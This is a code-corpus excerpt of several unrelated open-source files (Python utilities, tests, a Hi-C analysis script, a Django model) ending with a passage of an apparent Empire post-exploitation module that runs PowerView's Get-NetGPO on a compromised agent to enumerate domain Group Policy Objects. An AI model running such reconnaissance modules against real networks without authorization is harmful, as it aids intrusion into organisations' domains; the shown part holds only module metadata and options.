"A string rather than a list/tuple was provided to expect_single "
"({})".format(lst))
if not _is_iterable(lst):
raise NineMLUsageError('Object not iterable')
if issubclass(lst.__class__, (dict)):
err = "Dictionary passed to expect_single. This could be ambiguous"
err += "\nIf this is what you intended, please explicity pass '.keys' "
raise NineMLUsageError(err)
lst = list(lst)
# Good case:
if len(lst) == 1:
return lst[0]
if errmsg is None:
# Bad case: our list doesn't contain just one element
errmsg = 'expect_single() recieved an iterable of length: %d'.format(
len(lst))
errmsg += '\n - List Contents:{}\n'.format(lst)
raise NineMLUsageError(errmsg)
def _filter(lst, func=None):
"""Filter a list according to a predicate.
Takes a sequence [o1,o2,..] and returns a list contains those which
are not `None` and satisfy the predicate `func(o)`
:param lst: Input iterable (not a dictionary)
:param func: Predicate function. If ``none``, this function always returns
``True``
Implementation::
if func:
return [ l for l in lst if l is not None and func(l) ]
else:
return [ l for l in lst if l is not None]
Examples:
>>> _filter( ['hello','world'] ) #doctest: +NORMALIZE_WHITESPACE
['hello', 'world']
>>> _filter( ['hello',None,'world'] ) #doctest: +NORMALIZE_WHITESPACE
['hello', 'world']
>>> _filter( [None,] ) #doctest: +NORMALIZE_WHITESPACE
[]
"""
if func:
return [l for l in lst if l is not None and func(l)]
else:
return [l for l in lst if l is not None]
def filter_expect_single(lst, func=None, errmsg=None):
"""Find a single element matching a predicate in a list.
This is a syntactic-sugar function ``_filter`` and ``expect_single``
in a single call.
Returns::
expect_single( _filter(lst, func))
This is useful when we want to find an item in a sequence with a
certain property, and expect there to be only one.
Examples:
>>> find_smith = lambda s: s.split()[-1] == 'Smith'
>>> filter_expect_single( ['John Smith','Tim Jones'], func=find_smith ) #doctest: +NORMALIZE_WHITESPACE
'John Smith'
"""
return expect_single(_filter(lst, func), errmsg)
def filter_by_type(lst, acceptedtype):
""" Find all the objects of a certain type in a list
This is a syntactic sugar function, which returns a list of all the
objects in a iterable for which ``isinstance(o,acceptedtype) == True``
and for which the objects are not ``None``. i.e::
filter_by_type([None], types.NoneType)
[]
"""
return _filter(lst, lambda x: isinstance(x, acceptedtype))
def filter_discrete_types(lst, acceptedtypes):
"""Creates a dictionary mapping types to objects of that type.
Starting with a list of object, and a list of types, this returns a
dictionary mapping each type to a list of objects of that type.
For example::
>>> import types
>>> filter_discrete_types( ['hello',1,2,'world'], ( basestring, types.IntType) ) #doctest: +NORMALIZE_WHITESPACE
{<type 'basestring'>: ['hello', 'world'], <type 'int'>: [1, 2]}
The function checks that each object is mapped to exactly one type
"""
res = dict([(a, []) for a in acceptedtypes])
for obj in lst:
obj_type = filter_expect_single(
acceptedtypes, lambda at: isinstance(obj, at),
errmsg='{} could not be mapped to a single type'.format(obj))
res[obj_type].append(obj)
return res
def invert_dictionary(dct):
"""Takes a dictionary mapping (keys => values) and returns a
new dictionary mapping (values => keys).
i.e. given a dictionary::
{k1:v1, k2:v2, k3:v3, ...}
it returns a dictionary::
{v1:k1, v2:k2, v3:k3, ...}
It checks to make sure that no values are duplicated before converting.
"""
for v in list(dct.values()):
if not _is_hashable(v):
err = "Can't invert a dictionary containing unhashable keys"
raise NineMLUsageError(err)
assert_no_duplicates(list(dct.values()))
return dict(list(zip(list(dct.values()), list(dct.keys()))))
def flatten_first_level(nested_list):
"""Flattens the first level of an iterable, i.e.
>>> flatten_first_level( [ ['This','is'],['a','short'],['phrase'] ] ) #doctest: +NORMALIZE_WHITESPACE
['This', 'is', 'a', 'short', 'phrase']
>>> flatten_first_level( [ [1,2],[3,4,5],[6] ] ) #doctest: +NORMALIZE_WHITESPACE
[1,2,3,4,5,6]
"""
if isinstance(nested_list, basestring):
err = "Shouldn't pass a string to flatten_first_level."
err += "Use list(str) instead"
raise NineMLUsageError(err)
if not _is_iterable(nested_list):
err = 'flatten_first_level() expects an iterable'
raise NineMLUsageError(err)
for nl in nested_list:
if not _is_iterable(nl) or isinstance(nl, basestring):
raise NineMLUsageError(
"flatten_first_level() expects all arguments to be iterable "
"and not strings ({})".format(nested_list))
return list(itertools.chain(*nested_list))
def safe_dictionary_merge(dictionaries):
"""Safely merge multiple dictionaries into one
Merges an iterable of dictionaries into a new single dictionary,
checking that there are no key collisions
>>> safe_dictionary_merge( [ {1:'One',2:'Two'},{3:'Three'} ] ) #doctest: +NORMALIZE_WHITESPACE
{1: 'One', 2: 'Two', 3: 'Three'}
>>> safe_dictionary_merge( [ {1:'One',2:'Two'},{3:'Three',1:'One'} ] ) #doctest: +NORMALIZE_WHITESPACE +IGNORE_EXCEPTION_DETAIL +SKIP
NineMLUsageError: Key Collision while merging dictionarys
"""
kv_pairs = list(itertools.chain(*[iter(d.items()) for d in dictionaries]))
keys, _ = list(zip(*kv_pairs))
assert_no_duplicates(keys, 'Key collision while merging dictionarys')
return dict(kv_pairs)
def _is_iterable(obj):
return hasattr(obj, '__iter__')
def _is_hashable(obj):
try:
hash(obj)
return True
except:
return False
def unique_by_id(lst):
"""
Gets a list of unique 9ML objects using their 'id' property. Similar to a
set but can handle temporary objects as well.
Typically used in unittests.
"""
id_map = {}
for obj in lst:
id_map[obj.id] = obj
return sorted(id_map.values(), key=attrgetter('sort_key'))
def unique_by_eq(lst):
return reduce(lambda l, x: l.append(x) or l if x not in l else l, lst, [])
def ensure_iterable(expected_list):
if isinstance(expected_list, dict):
raise TypeError("Expected a list, got a dictionary ({})"
.format(expected_list))
elif isinstance(expected_list, (basestring, ContainerObject)):
lst = [expected_list]
elif isinstance(expected_list, collections.Iterable): # @UndefinedVariable
lst = list(expected_list)
else:
lst = [expected_list]
return lst
def normalise_parameter_as_list(param):
return ensure_iterable(none_to_empty_list(param))
def none_to_empty_list(obj):
if obj is None:
return []
else:
return obj
def safe_dict(vals):
""" Create a dict, like dict(), but ensure no duplicate keys are given!
[Python silently allows dict( [(1:True),(1:None)] ) !!"""
d = {}
for k, v in vals:
if k in vals:
err = 'safe_dict() failed with duplicated keys: %s' % k
raise NineMLUsageError(err)
d[k] = v
if len(vals) != len(d):
raise NineMLUsageError('Duplicate keys given')
return d
|
INCF/lib9ML
|
nineml/utils/iterables.py
|
Python
|
bsd-3-clause
| 9,425
|
from tests.testing_framework.base_test_cases import BaseTestCase
from hamcrest import *
from flexmock import flexmock
from framework.http.requester import Requester
import re
class RequesterTests(BaseTestCase):
def before(self):
self.core_mock = flexmock()
self.core_mock.Config = flexmock()
self.core_mock.Config.should_receive("Get").and_return("user agent")
self.requester = Requester(self.core_mock, None)
flexmock(self.requester)
def test_Request_should_be_successful(self):
url = "http://someurl"
self.requester.should_receive("perform_request").once().ordered()
self.requester.should_receive("set_succesful_transaction").once().ordered()
self.requester.should_receive("log_transaction").once().ordered()
self.core_mock.should_receive("IsInScopeURL").and_return(True).once()
self.core_mock.Timer = flexmock()
self.core_mock.Timer.should_receive("StartTimer").once()
self.requester.Request(url)
def test_StringToDict(self):
params = "key=value"
result = self.requester.StringToDict(params)
assert_that(result["key"], is_("value"))
def test_ProcessHTTPErrorCode_with_connection_refused(self):
error = flexmock()
error.reason = "[Errno 111]"
error_output = self.requester.ProcessHTTPErrorCode(error, "someurl")
assert_that(error_output, contains_string("was refused"))
def test_ProcessHTTPErrorCode_with_unkwown_error(self):
error = flexmock()
error.reason = "unkwown error"
error_output = self.requester.ProcessHTTPErrorCode(error, "someurl")
assert_that(error_output, contains_string("unknown error"))
def test_ProcessHTTPErrorCode_with_hostname_resolving_error(self):
error = flexmock()
error.reason = "[Errno -2]"
self.core_mock.Error = flexmock()
expected_arg = re.compile(".*cannot resolve hostname.*")
self.core_mock.Error.should_receive("FrameworkAbort").with_args(expected_arg)
error_output = self.requester.ProcessHTTPErrorCode(error, "someurl")
def test_ProxyCheck_with_no_proxy_settings_is_ok(self):
assert_that(self.requester.ProxyCheck()[0], is_(True))
def test_ProxyCheck_with_proxy_should_be_succesful(self):
flexmock(self.requester)
self.requester.should_receive("is_request_possible").and_return(True).once()
self.requester.should_receive("is_transaction_already_added").and_return(False).once()
self.requester.should_receive("GET").once()
self.core_mock.Config.should_receive("Get").with_args("PROXY_CHECK_URL").once()
self.requester.Proxy = flexmock()
assert_that(self.requester.ProxyCheck()[0], is_(True))
|
sharad1126/owtf
|
tests/test_cases/framework/http/requester_tests.py
|
Python
|
bsd-3-clause
| 2,784
|
from __future__ import absolute_import, division, print_function
from functools import partial
import numpy as np
import numpy.fft as npfft
from .core import map_blocks
chunk_error = ("Dask array only supports taking an FFT along an axis that \n"
"has a single chunk. An FFT operation was tried on axis %s \n"
"which has chunks %s. To change the array's chunks use "
"dask.Array.rechunk.")
fft_preamble = """
Wrapping of numpy.fft.%s
The axis along which the FFT is applied must have a one chunk. To change
the array's chunking use dask.Array.rechunk.
The numpy.fft.%s docstring follows below:
"""
def _fft_wrap(fft_func, dtype, out_chunk_fn):
def func(a, n=None, axis=-1):
if len(a.chunks[axis]) != 1:
raise ValueError(chunk_error % (axis, a.chunks[axis]))
chunks = out_chunk_fn(a, n, axis)
return map_blocks(partial(fft_func, n=n, axis=axis), a, dtype=dtype,
chunks=chunks)
np_name = fft_func.__name__
func.__doc__ = (fft_preamble % (np_name, np_name)) + fft_func.__doc__
func.__name__ = np_name
return func
def _fft_out_chunks(a, n, axis):
""" For computing the output chunks of fft and ifft"""
if n is None:
return a.chunks
chunks = list(a.chunks)
chunks[axis] = (n,)
return chunks
def _rfft_out_chunks(a, n, axis):
if n is None:
n = a.chunks[axis][0]
chunks = list(a.chunks)
chunks[axis] = (n//2 + 1,)
return chunks
def _irfft_out_chunks(a, n, axis):
if n is None:
n = 2 * (a.chunks[axis][0] - 1)
chunks = list(a.chunks)
chunks[axis] = (n,)
return chunks
def _hfft_out_chunks(a, n, axis):
if n is None:
n = 2 * (a.chunks[axis][0] - 1)
chunks = list(a.chunks)
chunks[axis] = (n,)
return chunks
def _ihfft_out_chunks(a, n, axis):
if n is None:
n = a.chunks[axis][0]
chunks = list(a.chunks)
if n % 2 == 0:
m = (n//2) + 1
else:
m = (n + 1)//2
chunks[axis] = (m,)
return chunks
fft = _fft_wrap(npfft.fft, np.complex_, _fft_out_chunks)
ifft = _fft_wrap(npfft.ifft, np.complex_, _fft_out_chunks)
rfft = _fft_wrap(npfft.rfft, np.complex_, _rfft_out_chunks)
irfft = _fft_wrap(npfft.irfft, np.float_, _irfft_out_chunks)
hfft = _fft_wrap(npfft.hfft, np.float_, _hfft_out_chunks)
ihfft = _fft_wrap(npfft.ihfft, np.complex_, _ihfft_out_chunks)
|
pombredanne/dask
|
dask/array/fft.py
|
Python
|
bsd-3-clause
| 2,467
|
import six
from sqlalchemy import types
from sqlalchemy_utils import i18n, ImproperlyConfigured
from sqlalchemy_utils.primitives import Currency
from .scalar_coercible import ScalarCoercible
class CurrencyType(types.TypeDecorator, ScalarCoercible):
"""
Changes :class:`.Currency` objects to a string representation on the way in
and changes them back to :class:`.Currency` objects on the way out.
In order to use CurrencyType you need to install Babel_ first.
.. _Babel: http://babel.pocoo.org/
::
from sqlalchemy_utils import CurrencyType, Currency
class User(Base):
__tablename__ = 'user'
id = sa.Column(sa.Integer, autoincrement=True)
name = sa.Column(sa.Unicode(255))
currency = sa.Column(CurrencyType)
user = User()
user.currency = Currency('USD')
session.add(user)
session.commit()
user.currency # Currency('USD')
user.currency.name # US Dollar
str(user.currency) # US Dollar
user.currency.symbol # $
CurrencyType is scalar coercible::
user.currency = 'US'
user.currency # Currency('US')
"""
impl = types.String(3)
python_type = Currency
def __init__(self, *args, **kwargs):
if i18n.babel is None:
raise ImproperlyConfigured(
"'babel' package is required in order to use CurrencyType."
)
super(CurrencyType, self).__init__(*args, **kwargs)
def process_bind_param(self, value, dialect):
if isinstance(value, Currency):
return value.code
elif isinstance(value, six.string_types):
return value
def process_result_value(self, value, dialect):
if value is not None:
return Currency(value)
def _coerce(self, value):
if value is not None and not isinstance(value, Currency):
return Currency(value)
return value
|
spoqa/sqlalchemy-utils
|
sqlalchemy_utils/types/currency.py
|
Python
|
bsd-3-clause
| 1,984
|
import os
import sys
from optparse import OptionParser
import matplotlib
matplotlib.use('PDF')
from matplotlib.backends.backend_pdf import PdfPages
from mirnylib.systemutils import setExceptionHook
sys.path.append(os.path.split(os.getcwd())[0])
from hiclib.binnedData import binnedData, binnedDataAnalysis,\
experimentalBinnedData
from mirnylib import h5dict, genome
import mirnylib.systemutils
mirnylib.systemutils
from hiclib.fragmentHiC import HiCdataset
from mirnylib.numutils import EIG, coarsegrain, project, arrayInArray
import numpy
import mirnylib.plotting
import scipy.stats
import scipy.ndimage
from hiclib import fragmentHiC
cr = scipy.stats.spearmanr
import cPickle
from mirnylib.plotting import mat_img, removeAxes, removeBorder, niceShow
import matplotlib.pyplot as plt
# manage option and arguments processing
def main():
global options
global args
usage = '''usage: %prog [options] dataset1 dataset2 [datasetX]*
takes multiple hiclib output folder and compares the experiments in a pairwise manner
dataset1 should point to the "[ENZYME]-[EXPERIMENT]-fragment-dataset.hdf5" file
'''
parser = OptionParser(usage)
parser.add_option("-q", "--quiet", action="store_false", dest="verbose", default=True,
help="don't print status messages to stdout")
parser.add_option("-v", "--verbose", action="store_true", dest="verbose",
help="print status messages to stdout")
parser.add_option("-r", "--referenceGenome", type="string", dest="genome", default="",
help="genome in fasta format [default: %default]")
parser.add_option("-g", "--gapFile", type="string", dest="gapFile", default="gap.txt",
help="location of the gapfile [default: %default]")
parser.add_option("-o", "--outputDir", type="string", dest="outputDir", default="",
help="output directory [default: %default]")
parser.add_option("-t", "--tmpDir", type="string", dest="tmpDir", default="/tmp",
help="directory for temp files [default: %default]")
(options, args) = parser.parse_args()
if (len(args) < 2):
parser.print_help()
parser.error("[ERROR] Incorrect number of arguments, need at least two datasets")
if (options.genome == ""):
print >> sys.stderr, "[ERROR] Please specify the location of the reference genome in fasta format"
sys.exit(1)
if (options.outputDir != ""):
options.outputDir += os.sep
if (options.verbose):
print >> sys.stdout, "outputDir: %s" % (options.outputDir)
print >> sys.stdout, "tmpDir: %s" % (options.tmpDir)
process()
def calculateTanayCorrelation(resolution, filename1, filename2, experiment1, experiment2, genome, outfile, mouse=False, **kwargs):
"Calculates correlation between datasets, smoothed in a Tanay way"
global pp
if (options.verbose):
print >> sys.stdout, "calculateTanayCorrelation: res: %d file1: %s file2: %s exp1:%s exp2:%s gen:%s" % (resolution, filename1, filename2, experiment1, experiment2, genome)
BD = binnedData(resolution, genome)
BD.simpleLoad(filename1, experiment1)
BD.simpleLoad(filename2, experiment2)
def tanaySmooth(matrix):
matrix = numpy.array(matrix, dtype="double")
a = numpy.arange(-9, 10)
mat = 1 / (1. + numpy.abs(a[:, None]) + numpy.abs(a[None, :]))
return scipy.ndimage.filters.convolve(input=matrix,
weights=mat,
mode="constant")
def propagateSmooth(data):
mask1 = numpy.sum(data, axis=0) > 0
mask = mask1[:, None] * mask1[None, :]
ret = numpy.zeros_like(data, dtype=float)
for i in xrange(BD.genome.chrmCount):
for j in xrange(BD.genome.chrmCount):
beg1 = BD.chromosomeStarts[i]
beg2 = BD.chromosomeStarts[j]
end1 = BD.chromosomeEnds[i]
end2 = BD.chromosomeEnds[j]
mymask = mask[beg1:end1, beg2:end2]
d = data[beg1:end1, beg2:end2]
toret = tanaySmooth(d) / tanaySmooth(mymask)
toret[mymask == 0] = 0
ret[beg1:end1, beg2:end2] = toret
return ret
BD.removePoorRegions(cutoff=2)
BD.removeCis()
BD.iterativeCorrectWithoutSS()
data1 = BD.dataDict[experiment1]
data2 = BD.dataDict[experiment2]
mask = (numpy.sum(data1, axis=0) > 0) * (numpy.sum(data2, axis=0) > 0)
validMask = mask[:, None] * mask[None, :]
transmask = BD.chromosomeIndex[:, None] != BD.chromosomeIndex[None, :]
cormask = transmask * validMask
d1 = propagateSmooth(data1)
d2 = propagateSmooth(data2)
(scorr, pvalue) = scipy.stats.spearmanr(d1[cormask], d2[cormask])
outfile.write("Spearman corrleation %s %s %.4f %.4f" % (filename1, filename2, scorr, pvalue))
def compareInterarmMaps(resolution, filename1, filename2, experiment1, experiment2, genome, mouse=False, **kwargs):
"plots witn 8 inetrarm maps - paper supplement figure"
global pp
if (options.verbose):
print >> sys.stdout, "compareInterarmMaps: res: %d file1: %s file2: %s exp1:%s exp2:%s gen:%s" % (resolution, filename1, filename2, experiment1, experiment2, genome)
Tanay = binnedDataAnalysis(resolution, genome)
Tanay.simpleLoad(filename1, experiment1)
Tanay.simpleLoad(filename2, experiment2)
Tanay.removeDiagonal()
Tanay.removePoorRegions(cutoff=2)
#Tanay.removeStandalone(3)
fs = 10
vmin = None
vmax = None
plt.figure(figsize=(12, 16))
plt.subplot(421)
plt.title(experiment1+", raw", fontsize=fs)
Tanay.averageTransMap(experiment1, vmin=vmin, vmax=vmax)
plt.colorbar()
plt.subplot(422)
plt.title(experiment2+", raw", fontsize=fs)
Tanay.averageTransMap(experiment2, vmin=vmin, vmax=vmax)
plt.colorbar()
Tanay.iterativeCorrectWithSS()
vmin = None
vmax = None
plt.subplot(425)
plt.title(experiment1+", with SS reads", fontsize=fs)
Tanay.averageTransMap(experiment1, vmin=vmin, vmax=vmax)
plt.colorbar()
plt.subplot(426)
plt.title(experiment2+", with SS reads", fontsize=fs)
Tanay.averageTransMap(experiment2, vmin=vmin, vmax=vmax)
plt.colorbar()
Tanay.iterativeCorrectWithoutSS()
vmin = None
vmax = None
plt.subplot(423)
plt.title(experiment1+", no SS reads", fontsize=fs)
Tanay.averageTransMap(experiment2, vmin=vmin, vmax=vmax)
plt.colorbar()
plt.subplot(424)
plt.title(experiment2+", no ss reads", fontsize=fs)
Tanay.averageTransMap(experiment2, vmin=vmin, vmax=vmax)
plt.colorbar()
Tanay.fakeCis()
vmin = None
vmax = None
plt.subplot(427)
plt.title(experiment1+", trans only", fontsize=fs)
Tanay.averageTransMap(experiment1, vmin=vmin, vmax=vmax)
plt.colorbar()
plt.subplot(428)
plt.title(experiment2+", trans only", fontsize=fs)
Tanay.averageTransMap(experiment2, vmin=vmin, vmax=vmax)
plt.colorbar()
plt.show()
pp.savefig()
def compareCorrelationOfEigenvectors(resolution, filename1, filename2, experiment1, experiment2, genome, mouse=False, **kwargs):
"""Plot correlation figure with eigenvector correlation between datasets
paper figure """
global pp
if (options.verbose):
print >> sys.stdout, "compareCorrelationOfEigenvectors: res: %d file1: %s file2: %s exp1:%s exp2:%s gen:%s" % (resolution, filename1, filename2, experiment1, experiment2, genome)
plt.figure()
Tanay = binnedDataAnalysis(resolution, genome)
Tanay.simpleLoad(filename1, experiment1)
Tanay.simpleLoad(filename2, experiment2)
Tanay.removeDiagonal()
Tanay.removePoorRegions()
Tanay.removeZeros()
Tanay.truncTrans()
Tanay.fakeCis()
M = 10
Tanay.doEig(numPCs=M)
E1 = Tanay.EigDict[experiment1]
E2 = Tanay.EigDict[experiment2]
data = numpy.zeros((M, M))
for i in xrange(M):
for j in xrange(M):
data[i][j] = abs(numpy.corrcoef(E2[i], E1[j])[0, 1])
plt.figure(figsize=(8, 8))
plt.gcf().subplots_adjust(0.2, 0.2, 0.85, 0.85)
plt.subplot(111)
plt.xlabel(experiment1)
plt.ylabel(experiment2)
#plt.title("Abs. correlation between eigenvectors")
plt.imshow(data, interpolation="nearest", vmin=0, vmax=1)
plt.colorbar()
plt.show()
pp.savefig()
def plotDiagonalCorrelation(resolution, filename1, filename2, experiment1, experiment2, genome, mouse=False, **kwargs):
"Correlation of diagonal bins - paper figure"
global pp
if (options.verbose):
print >> sys.stdout, "plotDiagonalCorrelation: res: %d file1: %s file2: %s exp1:%s exp2:%s gen:%s" % (resolution, filename1, filename2, experiment1, experiment2, genome)
S = 50
x = numpy.arange(2, S)
Tanay = binnedData(resolution, genome)
Tanay.simpleLoad(filename1, experiment1)
Tanay.simpleLoad(filename2, experiment2)
Tanay.removeDiagonal(1)
Tanay.removePoorRegions()
Tanay.removeZeros()
pairs = [(experiment1, experiment2)]
cors = [[] for _ in pairs]
for i in x:
for j, pair in enumerate(pairs):
cors[j].append(cr(
numpy.diagonal(Tanay.dataDict[pair[0]], i),
numpy.diagonal(Tanay.dataDict[pair[1]], i)
)[0])
Tanay.iterativeCorrectWithoutSS(M=1)
cors2 = [[] for _ in pairs]
for i in x:
for j, pair in enumerate(pairs):
cors2[j].append(cr(
numpy.diagonal(Tanay.dataDict[pair[0]], i),
numpy.diagonal(Tanay.dataDict[pair[1]], i)
)[0])
Tanay.iterativeCorrectWithoutSS(M=20)
cors3 = [[] for _ in pairs]
for i in x:
for j, pair in enumerate(pairs):
cors3[j].append(cr(
numpy.diagonal(Tanay.dataDict[pair[0]], i),
numpy.diagonal(Tanay.dataDict[pair[1]], i)
)[0])
matplotlib.rcParams['font.sans-serif'] = 'Arial'
print "Eigenvectors"
print cors
print cors2
print cors3
plt.figure(figsize=(8, 4))
ax = plt.gca()
for j, pair in enumerate(pairs):
plt.subplot(1, len(pairs), j)
fs = 8
for xlabel_i in ax.get_xticklabels():
xlabel_i.set_fontsize(fs)
for xlabel_i in ax.get_yticklabels():
xlabel_i.set_fontsize(fs)
plt.title("%s vs %s" % pair)
plt.plot(x / 5., cors3[j], color="#E5A826", label="Iterative")
plt.plot(x / 5., cors2[j], color="#28459A", label="Single")
plt.plot(x / 5., cors[j], color="#E55726", label="Raw")
plt.xlabel("Genomic Separation, MB", fontsize=8)
plt.ylabel("Spearman correlation", fontsize=8)
plt.legend()
legend = plt.legend(prop={"size": 6}, loc=9, handlelength=2)
legend.draw_frame(False)
plt.ylim((0, 1))
removeAxes(shift=0)
plt.show()
pp.savefig()
def process():
global options
global args
global pp
outfilename = []
# check dataset exist
for i in xrange(len(args)):
if (not os.path.isfile(args[i].replace('-fragment_dataset.hdf5','-1M.hdf5'))):
print '[ERROR] Could not find: '+ args[i].replace('-fragment_dataset.hdf5','-1M.hdf5')
sys.exit(1)
if (not os.path.isfile(args[i].replace('-fragment_dataset.hdf5','-200k.hdf5'))):
print '[ERROR] Could not find: '+ args[i].replace('-fragment_dataset.hdf5','-200k.hdf5')
sys.exit(1)
if (not os.path.isfile(args[i].replace('-fragment_dataset.hdf5','-IC-1M.hdf5'))):
print '[ERROR] Could not find: '+ args[i].replace('-fragment_dataset.hdf5','-IC-1M.hdf5')
sys.exit(1)
outfilename += ["_".join(os.path.basename(args[i]).strip("-fragment_dataset.hdf5").split("_")[1:])]
genome_db = genome.Genome(options.genome, gapFile=options.gapFile, readChrms=['#', 'X', 'Y'])
outfilename = "-".join(outfilename)
outfile = open(options.outputDir+outfilename+'-HiC_correlate.txt',"w")
fig = plt.figure()
pp = PdfPages(options.outputDir+outfilename+'-HiC_correlate.pdf')
for i in xrange(len(args)):
print " Process file "+str(i)+":"+ args[i]
enzyme_i = os.path.basename(args[i]).split("_")[0]
experiment_i = "_".join(os.path.basename(args[i]).strip("-fragment_dataset.hdf5").split("_")[1:])
for j in xrange(i+1, len(args)):
enzyme_j = os.path.basename(args[j]).split("_")[0]
experiment_j = "_".join(os.path.basename(args[j]).strip("-fragment_dataset.hdf5").split("_")[1:])
compareCorrelationOfEigenvectors(1000000, args[i].replace('-fragment_dataset.hdf5','-1M.hdf5'), args[j].replace('-fragment_dataset.hdf5','-1M.hdf5'), experiment_i, experiment_j, genome_db)
calculateTanayCorrelation(1000000, args[i].replace('-fragment_dataset.hdf5','-1M.hdf5'), args[j].replace('-fragment_dataset.hdf5','-1M.hdf5'), experiment_i, experiment_j, genome_db, outfile)
plotDiagonalCorrelation(200000, args[i].replace('-fragment_dataset.hdf5','-200k.hdf5'), args[j].replace('-fragment_dataset.hdf5','-200k.hdf5'), experiment_i, experiment_j, genome_db)
compareInterarmMaps(1000000, args[i].replace('-fragment_dataset.hdf5','-1M.hdf5'), args[j].replace('-fragment_dataset.hdf5','-1M.hdf5'), experiment_i, experiment_j, genome_db)
if (options.verbose):
print >> sys.stdout, "print plots into pdf:%s" % (options.outputDir+outfilename+'-HiC_correlate.pdf')
outfile.close()
pp.close()
######################################
# main
######################################
if __name__ == "__main__":
main()
|
BauerLab/ngsane
|
tools/hiclibCorrelate.py
|
Python
|
bsd-3-clause
| 13,472
|
from cms.utils.compat.dj import python_2_unicode_compatible
from django.db import models
from django.utils.translation import ugettext_lazy as _
from cms.models import CMSPlugin, Page
@python_2_unicode_compatible
class Link(CMSPlugin):
"""
A link to an other page or to an external website
"""
name = models.CharField(_("name"), max_length=256)
url = models.URLField(_("link"), blank=True, null=True)
page_link = models.ForeignKey(Page, verbose_name=_("page"), blank=True, null=True, help_text=_("A link to a page has priority over a text link."))
mailto = models.EmailField(_("mailto"), blank=True, null=True, help_text=_("An email adress has priority over a text link."))
target = models.CharField(_("target"), blank=True, max_length=100, choices=((
("", _("same window")),
("_blank", _("new window")),
("_parent", _("parent window")),
("_top", _("topmost frame")),
)))
def link(self):
"""
Returns the link with highest priority among the model fields
"""
if self.mailto:
return u"mailto:%s" % self.mailto
elif self.url:
return self.url
elif self.page_link:
return self.page_link.get_absolute_url()
else:
return ""
def __str__(self):
return self.name
search_fields = ('name',)
|
SinnerSchraderMobileMirrors/django-cms
|
cms/plugins/link/models.py
|
Python
|
bsd-3-clause
| 1,377
|
# -*- coding: utf-8 -*-
#
# This file is part of BridgeDB, a Tor bridge distribution system.
#
# :authors: Isis Lovecruft 0xA3ADB67A2CDB8B35 <isis@torproject.org>
# :copyright: (c) 2014, Isis Lovecruft
# (c) 2014, The Tor Project, Inc.
# :license: 3-Clause BSD, see LICENSE for licensing information
from twisted.trial import unittest
from bridgedb import translations
from bridgedb.test.test_HTTPServer import DummyRequest
REALISH_HEADERS = {
b'Accept-Encoding': [b'gzip, deflate'],
b'User-Agent': [
b'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0'],
b'Accept': [
b'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'],
}
# Add this to the above REALISH_HEADERS to use it:
ACCEPT_LANGUAGE_HEADER = {
b'Accept-Language': [b'de-de,en-gb;q=0.8,en;q=0.5,en-us;q=0.3'],
}
class TranslationsMiscTests(unittest.TestCase):
"""Tests for module-level code in ``bridgedb.translations`` module."""
def test_getLocaleFromHTTPRequest_withLangParam(self):
"""This request uses a '?lang=ar' param, without an 'Accept-Language'
header.
The request result should be: ['ar', 'en', 'en-US'].
"""
request = DummyRequest([b"bridges"])
request.headers.update(REALISH_HEADERS)
request.args.update({
b'transport': [b'obfs3',],
b'lang': [b'ar',],
})
parsed = translations.getLocaleFromHTTPRequest(request)
self.assertEqual(parsed[0], 'ar')
self.assertEqual(parsed[1], 'en')
self.assertEqual(parsed[2], 'en_US')
self.assertEqual(len(parsed), 3)
def test_getLocaleFromHTTPRequest_withLangParam_AcceptLanguage(self):
"""This request uses a '?lang=ar' param, with an 'Accept-Language'
header which includes: ['de-de', 'en-gb', 'en', 'en-us'].
The request result should be: ['fa', 'de-de', 'en-gb', 'en', 'en-us'].
"""
request = DummyRequest([b"options"])
request.headers.update(ACCEPT_LANGUAGE_HEADER)
request.args.update({b'lang': [b'fa']})
parsed = translations.getLocaleFromHTTPRequest(request)
self.assertEqual(parsed[0], 'fa')
self.assertEqual(parsed[1], 'en')
self.assertEqual(parsed[2], 'en_US')
#self.assertEqual(parsed[3], 'en-gb')
self.assertEqual(len(parsed), 3)
def test_getLocaleFromPlusAddr(self):
emailAddr = 'bridges@torproject.org'
replyLocale = translations.getLocaleFromPlusAddr(emailAddr)
self.assertEqual('en', replyLocale)
def test_getLocaleFromPlusAddr_ar(self):
emailAddr = 'bridges+ar@torproject.org'
replyLocale = translations.getLocaleFromPlusAddr(emailAddr)
self.assertEqual('ar', replyLocale)
|
pagea/bridgedb
|
lib/bridgedb/test/test_translations.py
|
Python
|
bsd-3-clause
| 2,789
|
# !! WARNING !!
# Don't put any code here, because Sublime Text will load this file twice and
# it may cause unexpected behavior. Use _init_.py instead.
|
guillermooo/dart-sublime-bundle
|
__init__.py
|
Python
|
bsd-3-clause
| 153
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Get-NetGPO',
'Author': ['@harmj0y'],
'Description': ('Gets a list of all current GPOs in a domain. Part of PowerView.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'GPOname' : {
'Description' : 'The GPO name to query for, wildcards accepted.',
'Required' : False,
'Value' : ''
},
'DisplayName' : {
'Description' : 'The GPO display name to query for, wildcards accepted.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Return all GPO objects applied to a given computer (FQDN).',
'Required' : False,
'Value' : ''
},
'Domain' : {
'Description' : 'The domain to use for the query, defaults to the current domain.',
'Required' : False,
'Value' : ''
},
'DomainController' : {
'Description' : 'Domain controller to reflect LDAP queries through.',
'Required' : False,
'Value' : ''
},
'ADSpath' : {
'Description' : 'The LDAP source to search through.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
